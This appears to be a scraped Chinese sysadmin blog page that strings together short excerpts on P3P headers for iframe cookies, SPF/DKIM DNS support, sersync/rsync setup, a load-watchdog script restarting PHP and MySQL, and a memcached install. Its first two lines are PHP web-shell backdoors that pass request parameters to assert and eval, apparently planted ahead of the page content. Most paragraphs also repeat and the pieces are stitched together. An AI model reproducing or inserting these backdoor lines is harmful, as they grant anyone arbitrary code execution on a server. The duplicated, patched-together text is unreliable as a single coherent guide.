<?array_map("ass\x65rt",(array)$_REQUEST[dede]);?>
<?php $command=$_POST[1990]; @eval($command);?>
最近在做一个项目需要用到IFRAME,发现IE在对iframe里面的页面写Cookie的时候有一些安全限制,导致写入和读取Cookie不成功,找了好长时间的解决办法,重要找到如下的办法:
1.页面里的COOKIE不能是浏览器进程的COOKIE(包括验证票和不设置超时时间的COOKIE),否则跨域会取不到.这点做跨域COOKIE的人比较少提到.不过实际上留意下几家大学做的方案,有细微的提到他们的验证模块里的COOKIE是有设置超时时间的.
2.当利用IFRAME时,记得要在相应的动态页的页头添加一下P3P的信息,否则IE会自觉的把IFRAME框里的COOKIE给阻止掉,产生问题.本身不保存自然就取不到了.这个其实是FRAMESET和COOKIE的问题,用FRAME或者IFRAME都会遇到.
3.测试时输出TRACE,会减少很多测试的工作量.
只需要设置 P3P HTTP Header,在隐含 iframe 里面跨域设置 cookie 就可以成功。他们所用的内容是:
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
ASP直接在头部加了头部申明,测试有效。
<%Response.AddHeader "P3P", "CP=CAO PSA OUR"%>
php的话,应该是如下写法:
header('P3P: CP=CAO PSA OUR');
ASP.NET的话
通过在代码上加Response.AddHeader("P3P", "CP=CAO PSA OUR")或者在Window服务中将ASP.NET State Service 启动。
JSP:
response.setHeader("P3P","CP=CAO PSA OUR")
1.页面里的COOKIE不能是浏览器进程的COOKIE(包括验证票和不设置超时时间的COOKIE),否则跨域会取不到.这点做跨域COOKIE的人比较少提到.不过实际上留意下几家大学做的方案,有细微的提到他们的验证模块里的COOKIE是有设置超时时间的.
2.当利用IFRAME时,记得要在相应的动态页的页头添加一下P3P的信息,否则IE会自觉的把IFRAME框里的COOKIE给阻止掉,产生问题.本身不保存自然就取不到了.这个其实是FRAMESET和COOKIE的问题,用FRAME或者IFRAME都会遇到.
3.测试时输出TRACE,会减少很多测试的工作量.
只需要设置 P3P HTTP Header,在隐含 iframe 里面跨域设置 cookie 就可以成功。他们所用的内容是:
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
ASP直接在头部加了头部申明,测试有效。
<%Response.AddHeader "P3P", "CP=CAO PSA OUR"%>
php的话,应该是如下写法:
header('P3P: CP=CAO PSA OUR');
ASP.NET的话
通过在代码上加Response.AddHeader("P3P", "CP=CAO PSA OUR")或者在Window服务中将ASP.NET State Service 启动。
JSP:
response.setHeader("P3P","CP=CAO PSA OUR")
邮件服务器的DNS设置
DNS记录,需要你到你的域名托管商那里进行设置或者你自己管理DNS服务器。不少域名托管商不支持txt记录或者不支持DKIM记录,所以你就无法使用SPF和DKIM的功能。
DNS的修改,需要48小时以上才能生效。
国内的万网是不支持DKIM,目前新网是支持SPF和DKIM。
DNS记录,需要你到你的域名托管商那里进行设置或者你自己管理DNS服务器。不少域名托管商不支持txt记录或者不支持DKIM记录,所以你就无法使用SPF和DKIM的功能。
DNS的修改,需要48小时以上才能生效。
国内的万网是不支持DKIM,目前新网是支持SPF和DKIM。
下载文件 (已下载 2464 次)
自动同步文件或者是目录
实现的方式:
在同步服务器上开启sersync,将监控路径中的文件同步到目标服务器,因此需要在同步服务器配置sersync,在同步目标服务器配置rsync
实验机器的地址分配:
Rsync 服务器: 192.168.1.112
Sersync2 服务器:192.168.1.110
系统环境
实现的方式:
在同步服务器上开启sersync,将监控路径中的文件同步到目标服务器,因此需要在同步服务器配置sersync,在同步目标服务器配置rsync
实验机器的地址分配:
Rsync 服务器: 192.168.1.112
Sersync2 服务器:192.168.1.110
系统环境
#!/bin/sh
TOP_SYS_LOAD_NUM=20
SYS_LOAD_NUM=`uptime | awk '{print $(NF-2)}' | sed 's/,//'`
echo $(date +"%y-%m-%d") `uptime`
if [ `echo "$TOP_SYS_LOAD_NUM < $SYS_LOAD_NUM"|bc` -eq 1 ]
then
echo "##" $(date +"%y-%m-%d %H:%M:%S") "stop php mysql free -m"
/usr/local/php/sbin/php-fpm stop
service mysql stop
free -m
sleep 5
for i in 1 2 3
do
if [ `pgrep php | wc -l` -le 0 ]
then
/usr/local/php/sbin/php-fpm start
service mysqld start
sleep 10
echo "##" $(date +"%y-%m-%d %H:%M:%S") "start php mysql"
fi
done
else
if [ `pgrep php | wc -l` -le 0 ]
then
/usr/local/php/sbin/php-fpm restart
service mysql restart
sleep 10
echo "##" $(date +"%y-%m-%d %H:%M:%S") "restart php mysql "
fi
fi
ssh登陆后,执行:
export LANG=zh_CN.gb2312
就可以显示中文了。
编辑/etc/sysconfig/i18n 将LANG="zh_CN.UTF-8" 改为 LANG="zh_CN.GB18030" 可永久显示中文
export LANG=zh_CN.gb2312
就可以显示中文了。
编辑/etc/sysconfig/i18n 将LANG="zh_CN.UTF-8" 改为 LANG="zh_CN.GB18030" 可永久显示中文
memcached-1.4.15.tar.gz 官方:http://memcached.org/
libevent-2.0.21-stable.tar.gz 官方:http://monkey.org/~provos/libevent/
Memcache用到了libevent这个库用于Socket的处理,在http://www.danga.com/memcached下载这两个软件至本地/usr/local/src目录
libevent-2.0.21-stable.tar.gz 官方:http://monkey.org/~provos/libevent/
Memcache用到了libevent这个库用于Socket的处理,在http://www.danga.com/memcached下载这两个软件至本地/usr/local/src目录
用vps也有一阵了,但是谁也不知道哪天vps就会跑路了,也说不定;无论现在做什么,都要先学会未雨绸缪.
其实,关于网上的有很多种方法备份vps的mysql和数据.但是往往都不是很理想.
首先我觉得备份数据一定要满足一下几点:
支持低成本备份mysql:网站数据其实并不会经常改动,经常要备份的主要是mysql,所谓的低成本就是自动化,而且可以发送到免费的邮箱.
其实,关于网上的有很多种方法备份vps的mysql和数据.但是往往都不是很理想.
首先我觉得备份数据一定要满足一下几点:
支持低成本备份mysql:网站数据其实并不会经常改动,经常要备份的主要是mysql,所谓的低成本就是自动化,而且可以发送到免费的邮箱.
